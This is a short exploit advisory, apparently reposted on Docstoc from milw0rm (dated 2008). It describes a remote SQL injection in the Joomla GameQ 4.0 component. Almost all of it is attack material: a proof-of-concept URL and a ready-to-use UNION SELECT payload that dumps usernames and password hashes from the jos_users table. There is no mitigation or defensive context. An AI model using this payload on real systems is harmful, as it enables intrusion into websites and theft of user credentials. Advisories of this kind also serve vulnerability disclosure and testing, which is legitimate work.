Docstoc

Joomla Component GameQ 4.0 Remote SQL injection Vulnerability

Document Sample
Joomla Component GameQ 4.0 Remote SQL injection Vulnerability Powered By Docstoc
					                    Joomla Component GameQ 4.0 Remote SQL injection Vulnerability                                    Page 1/1
  1    /−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\
  2    \                                                               /
  3    /         Joomla Component GameQ Remote SQL injection           \
  4    \                                                               /
  5    \−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−/
  6
  7
  8    [*] Author    :   His0k4 [ALGERIAN HaCkEr]
  9
  10   [*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}
  11
  12   [*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=−1 UNION SELECT 1,2,3,c
       oncat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users−−
  13
  14   # milw0rm.com [2008−06−07]




His0k4                                                                                                                06/07/2008